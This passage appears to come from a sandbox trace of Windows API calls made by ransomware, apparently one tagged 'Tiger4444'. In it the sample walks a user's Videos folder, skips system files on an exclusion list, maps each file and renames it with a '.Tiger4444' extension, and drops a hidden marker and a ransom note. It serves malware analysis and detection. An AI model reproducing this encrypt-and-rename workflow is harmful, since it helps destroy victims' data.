FILES.txt") returned 1 [0045.352] lstrcmpiW (lpString1="TaaSYvvFHS17rq.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.352] lstrcmpiW (lpString1="TaaSYvvFHS17rq.mp4", lpString2="Tiger4444.exe") returned -1 [0045.352] lstrcmpiW (lpString1="TaaSYvvFHS17rq.mp4", lpString2=".") returned 1 [0045.352] lstrcmpiW (lpString1="TaaSYvvFHS17rq.mp4", lpString2="..") returned 1 [0045.352] lstrcmpiW (lpString1="TaaSYvvFHS17rq.mp4", lpString2="windows") returned -1 [0045.352] lstrcmpiW (lpString1="TaaSYvvFHS17rq.mp4", lpString2="bootmgr") returned 1 [0045.352] lstrcmpiW (lpString1="TaaSYvvFHS17rq.mp4", lpString2="pagefile.sys") returned 1 [0045.352] lstrcmpiW (lpString1="TaaSYvvFHS17rq.mp4", lpString2="boot") returned 1 [0045.352] lstrcmpiW (lpString1="TaaSYvvFHS17rq.mp4", lpString2="ids.txt") returned 1 [0045.352] lstrcmpiW (lpString1="TaaSYvvFHS17rq.mp4", lpString2="NTUSER.DAT") returned 1 [0045.353] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="TaaSYvvFHS17rq.mp4" | out: lpString1="TaaSYvvFHS17rq.mp4") returned="TaaSYvvFHS17rq.mp4" [0045.353] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\TaaSYvvFHS17rq.mp4", dwFileAttributes=0x0) returned 1 [0045.353] lstrlenW (lpString="TaaSYvvFHS17rq.mp4") returned 18 [0045.353] lstrlenW (lpString="Tiger4444") returned 9 [0045.353] lstrcmpiW (lpString1="S17rq.mp4", lpString2="Tiger4444") returned -1 [0045.353] lstrlenW (lpString=".dll") returned 4 [0045.353] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0045.353] lstrlenW (lpString=".lnk") returned 4 [0045.353] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0045.353] lstrlenW (lpString=".ini") returned 4 [0045.353] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0045.353] lstrlenW (lpString=".sys") returned 4 [0045.353] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0045.353] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\TaaSYvvFHS17rq.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\1gssrsl s5lr83\\taasyvvfhs17rq.mp4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.353] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.353] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13680646667) returned 1 [0045.353] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=56995) returned 1 [0045.353] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0045.354] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0045.354] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe1b0, lpName=0x0) returned 0x2c8 [0045.354] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe1b0) returned 0xbe0000 [0045.356] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.356] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0045.356] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.356] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0045.356] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.357] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0045.357] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.357] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0045.357] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13680972442) returned 1 [0045.357] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0045.357] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0045.357] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.357] CloseHandle (hObject=0x2c8) returned 1 [0045.358] CloseHandle (hObject=0x260) returned 1 [0045.360] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\TaaSYvvFHS17rq.mp4.Tiger4444") returned 66 [0045.360] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\TaaSYvvFHS17rq.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\1gssrsl s5lr83\\taasyvvfhs17rq.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\TaaSYvvFHS17rq.mp4.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\1gssrsl s5lr83\\taasyvvfhs17rq.mp4.tiger4444"), dwFlags=0x1) returned 1 [0045.361] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=57008 | out: Addend=0xc6f980) returned 16533200 [0045.361] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=3 | out: Addend=0xc6f98c) returned 4453 [0045.361] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6e05dd70, ftCreationTime.dwHighDateTime=0x1d4cde5, ftLastAccessTime.dwLowDateTime=0x620ab070, ftLastAccessTime.dwHighDateTime=0x1d4d3eb, ftLastWriteTime.dwLowDateTime=0x620ab070, ftLastWriteTime.dwHighDateTime=0x1d4d3eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZcGza_BmC", cAlternateFileName="ZCGZA_~1")) returned 1 [0045.361] lstrcmpiW (lpString1="ZcGza_BmC", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.361] lstrcmpiW (lpString1="ZcGza_BmC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.361] lstrcmpiW (lpString1="ZcGza_BmC", lpString2="Tiger4444.exe") returned 1 [0045.361] lstrcmpiW (lpString1="ZcGza_BmC", lpString2=".") returned 1 [0045.361] lstrcmpiW (lpString1="ZcGza_BmC", lpString2="..") returned 1 [0045.361] lstrcmpiW (lpString1="ZcGza_BmC", lpString2="windows") returned 1 [0045.361] lstrcmpiW (lpString1="ZcGza_BmC", lpString2="bootmgr") returned 1 [0045.361] lstrcmpiW (lpString1="ZcGza_BmC", lpString2="pagefile.sys") returned 1 [0045.361] lstrcmpiW (lpString1="ZcGza_BmC", lpString2="boot") returned 1 [0045.361] lstrcmpiW (lpString1="ZcGza_BmC", lpString2="ids.txt") returned 1 [0045.361] lstrcmpiW (lpString1="ZcGza_BmC", lpString2="NTUSER.DAT") returned 1 [0045.361] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="ZcGza_BmC" | out: lpString1="ZcGza_BmC") returned="ZcGza_BmC" [0045.361] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc5a720 [0045.361] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x60) returned 0xc5e610 [0045.361] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc5a728 | out: ListHead=0xc66828, ListEntry=0xc5a728) returned 0xc665c8 [0045.361] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf066f770, ftCreationTime.dwHighDateTime=0x1d4c955, ftLastAccessTime.dwLowDateTime=0x27a82a50, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x27a82a50, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xf01, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Vz8dSb7ILROS.flv", cAlternateFileName="_VZ8DS~1.FLV")) returned 1 [0045.361] lstrcmpiW (lpString1="_Vz8dSb7ILROS.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.361] lstrcmpiW (lpString1="_Vz8dSb7ILROS.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.361] lstrcmpiW (lpString1="_Vz8dSb7ILROS.flv", lpString2="Tiger4444.exe") returned -1 [0045.361] lstrcmpiW (lpString1="_Vz8dSb7ILROS.flv", lpString2=".") returned 1 [0045.361] lstrcmpiW (lpString1="_Vz8dSb7ILROS.flv", lpString2="..") returned 1 [0045.362] lstrcmpiW (lpString1="_Vz8dSb7ILROS.flv", lpString2="windows") returned -1 [0045.362] lstrcmpiW (lpString1="_Vz8dSb7ILROS.flv", lpString2="bootmgr") returned -1 [0045.362] lstrcmpiW (lpString1="_Vz8dSb7ILROS.flv", lpString2="pagefile.sys") returned -1 [0045.362] lstrcmpiW (lpString1="_Vz8dSb7ILROS.flv", lpString2="boot") returned -1 [0045.362] lstrcmpiW (lpString1="_Vz8dSb7ILROS.flv", lpString2="ids.txt") returned -1 [0045.362] lstrcmpiW (lpString1="_Vz8dSb7ILROS.flv", lpString2="NTUSER.DAT") returned -1 [0045.362] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="_Vz8dSb7ILROS.flv" | out: lpString1="_Vz8dSb7ILROS.flv") returned="_Vz8dSb7ILROS.flv" [0045.362] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\_Vz8dSb7ILROS.flv", dwFileAttributes=0x0) returned 1 [0045.362] lstrlenW (lpString="_Vz8dSb7ILROS.flv") returned 17 [0045.362] lstrlenW (lpString="Tiger4444") returned 9 [0045.362] lstrcmpiW (lpString1="ILROS.flv", lpString2="Tiger4444") returned -1 [0045.362] lstrlenW (lpString=".dll") returned 4 [0045.362] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0045.362] lstrlenW (lpString=".lnk") returned 4 [0045.362] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0045.362] lstrlenW (lpString=".ini") returned 4 [0045.362] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0045.362] lstrlenW (lpString=".sys") returned 4 [0045.362] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0045.362] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\_Vz8dSb7ILROS.flv" (normalized: "c:\\users\\fd1hvy\\videos\\1gssrsl s5lr83\\_vz8dsb7ilros.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.362] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.362] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13681622542) returned 1 [0045.363] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=3841) returned 1 [0045.363] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0045.363] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0045.363] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1210, lpName=0x0) returned 0x2c8 [0045.363] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1210) returned 0xbe0000 [0045.364] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.364] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0045.364] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.365] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0045.365] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.365] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0045.365] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.365] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0045.365] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13681815219) returned 1 [0045.365] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0045.365] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0045.365] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.365] CloseHandle (hObject=0x2c8) returned 1 [0045.365] CloseHandle (hObject=0x260) returned 1 [0045.367] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\_Vz8dSb7ILROS.flv.Tiger4444") returned 65 [0045.367] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\_Vz8dSb7ILROS.flv" (normalized: "c:\\users\\fd1hvy\\videos\\1gssrsl s5lr83\\_vz8dsb7ilros.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\_Vz8dSb7ILROS.flv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\1gssrsl s5lr83\\_vz8dsb7ilros.flv.tiger4444"), dwFlags=0x1) returned 1 [0045.367] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=3856 | out: Addend=0xc6f980) returned 16590208 [0045.367] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4456 [0045.367] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf066f770, ftCreationTime.dwHighDateTime=0x1d4c955, ftLastAccessTime.dwLowDateTime=0x27a82a50, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x27a82a50, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xf01, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Vz8dSb7ILROS.flv", cAlternateFileName="_VZ8DS~1.FLV")) returned 0 [0045.367] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0045.368] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0045.368] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\videos\\1gssrsl s5lr83\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0045.368] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0045.368] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0045.369] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.369] CloseHandle (hObject=0x260) returned 1 [0045.369] CloseHandle (hObject=0x2ac) returned 1 [0045.370] GetCurrentThreadId () returned 0xfa8 [0045.370] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc5a728 [0045.370] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC") returned="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC" [0045.370] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5e610 | out: hHeap=0xc50000) returned 1 [0045.370] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5a720 | out: hHeap=0xc50000) returned 1 [0045.370] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC") returned="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC" [0045.370] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC\\") returned="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC\\" [0045.370] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC\\.BFC0E91B00AE8A0620D3" [0045.371] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\videos\\1gssrsl s5lr83\\zcgza_bmc\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.371] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.374] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.375] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.375] CloseHandle (hObject=0x2ac) returned 1 [0045.375] lstrlenW (lpString="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC") returned 47 [0045.375] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.375] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6e05dd70, ftCreationTime.dwHighDateTime=0x1d4cde5, ftLastAccessTime.dwLowDateTime=0x620ab070, ftLastAccessTime.dwHighDateTime=0x1d4d3eb, ftLastWriteTime.dwLowDateTime=0x8010f5a6, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc730c8 [0045.376] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.376] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.376] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.376] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.376] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6e05dd70, ftCreationTime.dwHighDateTime=0x1d4cde5, ftLastAccessTime.dwLowDateTime=0x620ab070, ftLastAccessTime.dwHighDateTime=0x1d4d3eb, ftLastWriteTime.dwLowDateTime=0x8010f5a6, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.376] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.376] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.376] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.376] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.376] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.376] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8010f5a6, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8010f5a6, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8010f5a6, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.376] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.376] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.376] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a8e1c0, ftCreationTime.dwHighDateTime=0x1d4c62b, ftLastAccessTime.dwLowDateTime=0xfe36edb0, ftLastAccessTime.dwHighDateTime=0x1d4c72f, ftLastWriteTime.dwLowDateTime=0xfe36edb0, ftLastWriteTime.dwHighDateTime=0x1d4c72f, nFileSizeHigh=0x0, nFileSizeLow=0x62f6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wyauoDThVWGo4KOPbrPe.flv", cAlternateFileName="WYAUOD~1.FLV")) returned 1 [0045.376] lstrcmpiW (lpString1="wyauoDThVWGo4KOPbrPe.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.376] lstrcmpiW (lpString1="wyauoDThVWGo4KOPbrPe.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.376] lstrcmpiW (lpString1="wyauoDThVWGo4KOPbrPe.flv", lpString2="Tiger4444.exe") returned 1 [0045.376] lstrcmpiW (lpString1="wyauoDThVWGo4KOPbrPe.flv", lpString2=".") returned 1 [0045.376] lstrcmpiW (lpString1="wyauoDThVWGo4KOPbrPe.flv", lpString2="..") returned 1 [0045.376] lstrcmpiW (lpString1="wyauoDThVWGo4KOPbrPe.flv", lpString2="windows") returned 1 [0045.376] lstrcmpiW (lpString1="wyauoDThVWGo4KOPbrPe.flv", lpString2="bootmgr") returned 1 [0045.376] lstrcmpiW (lpString1="wyauoDThVWGo4KOPbrPe.flv", lpString2="pagefile.sys") returned 1 [0045.376] lstrcmpiW (lpString1="wyauoDThVWGo4KOPbrPe.flv", lpString2="boot") returned 1 [0045.376] lstrcmpiW (lpString1="wyauoDThVWGo4KOPbrPe.flv", lpString2="ids.txt") returned 1 [0045.376] lstrcmpiW (lpString1="wyauoDThVWGo4KOPbrPe.flv", lpString2="NTUSER.DAT") returned 1 [0045.376] lstrcpyW (in: lpString1=0x30aeb08, lpString2="wyauoDThVWGo4KOPbrPe.flv" | out: lpString1="wyauoDThVWGo4KOPbrPe.flv") returned="wyauoDThVWGo4KOPbrPe.flv" [0045.376] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC\\wyauoDThVWGo4KOPbrPe.flv", dwFileAttributes=0x0) returned 1 [0045.377] lstrlenW (lpString="wyauoDThVWGo4KOPbrPe.flv") returned 24 [0045.377] lstrlenW (lpString="Tiger4444") returned 9 [0045.377] lstrcmpiW (lpString1="PbrPe.flv", lpString2="Tiger4444") returned -1 [0045.377] lstrlenW (lpString=".dll") returned 4 [0045.377] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0045.377] lstrlenW (lpString=".lnk") returned 4 [0045.377] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0045.377] lstrlenW (lpString=".ini") returned 4 [0045.377] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0045.377] lstrlenW (lpString=".sys") returned 4 [0045.377] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0045.377] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\ZcGza_BmC\\wyauoDThVWGo4KOPbrPe.flv" (normalized: "c:\\users\\fd1hvy\\videos\\1gssrsl s5lr83\\zcgza_bmc\\wyauodthvwgo4kopbrpe.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.377] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.377] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13683024307) returned 1 [0045.377] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=25334) returned 1 [0045.377] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0045.377] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d90 [0045.377] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6600, lpName=0x0) returned 0x2c8 [0045.377] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6600) returned 0xbe0000 [0045.378] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.378] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0045.378] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.378] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0045.378] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.379] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0045.379] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.379] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0045.379] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13683174465) returned 1 [0045.379] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0045.379] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d90 | out: 